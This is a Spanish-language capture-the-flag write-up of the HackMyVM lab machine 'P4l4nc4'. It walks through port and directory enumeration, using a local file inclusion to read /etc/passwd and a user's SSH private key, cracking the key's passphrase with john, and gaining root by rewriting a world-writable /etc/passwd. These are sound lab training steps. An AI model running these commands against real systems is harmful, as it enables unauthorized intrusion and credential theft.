cd ~/blog

~/writeups/hmv/121-p4l4nc4.md

121 - P4l4nc4

easy Linux hmv 24-01-2025
Leet-transformed wordlist directory discoveryLocal File Inclusion (LFI)SSH key crackingWritable /etc/passwd Privesc
hackmyvm.eu/machines/machine.php?vm=P4l4nc4

~1 min de lectura


Enumeramos puertos:

 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.186
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
...

El robots.txt contiene un texto del que generamos un wordlist con cewl. Lo transformamos a leet (1337) y volvemos a fuzzear, encontrando rutas anidadas:

 cewl -m 3 'http://192.168.1.186/robots.txt' > ./wordlist.txt

 gobuster dir -u 'http://192.168.1.186' -w ./wordlist_leet.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh -r
...
/n3gr4                (Status: 200) [Size: 4]
...

 cat wordlist_leet.txt | tr '[:upper:]' '[:lower:]' > wordlist_leet_lower.txt
 gobuster dir -u 'http://192.168.1.186/n3gr4' -w ./wordlist_leet_lower.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh -r
...
/m414nj3.php          (Status: 500) [Size: 0]
...

Fuzzeamos el parámetro de m414nj3.php y damos con page, vulnerable a LFI:

 ffuf -u 'http://192.168.1.186/n3gr4/m414nj3.php?FUZZ=../../../../../../../../../../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fw 1
...
page                    [Status: 200, ...]
...

 curl 'http://192.168.1.186/n3gr4/m414nj3.php?page=/etc/passwd' | grep home
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash

Leemos la id_rsa de p4l4nc4 y crackeamos su passphrase con john:

 curl 'http://192.168.1.186/n3gr4/m414nj3.php?page=/home/p4l4nc4/.ssh/id_rsa'  -o id_rsa

 ssh2john.py id_rsa > hash
 john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
friendster       (id_rsa)
...

 ssh p4l4nc4@192.168.1.186 -i id_rsa
p4l4nc4@192.168.1.186's password: friendster
...
p4l4nc4@4ng014:~$

Obtenemos la primera flag. Para escalar, /etc/passwd es escribible (Writable Critical Files Privesc):

p4l4nc4@4ng014:/tmp$ ls -l /etc/passwd
-rw-rw-rw- 1 root root 1066 Jan 24 10:55 /etc/passwd

Generamos un hash con perl y reemplazamos la contraseña de root:

 perl -e 'print crypt("1234","aa")'
aatxRPdZ/m52.

p4l4nc4@4ng014:/tmp$ nano /etc/passwd
p4l4nc4@4ng014:/tmp$ su root
Password: 1234
root@4ng014:/tmp#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados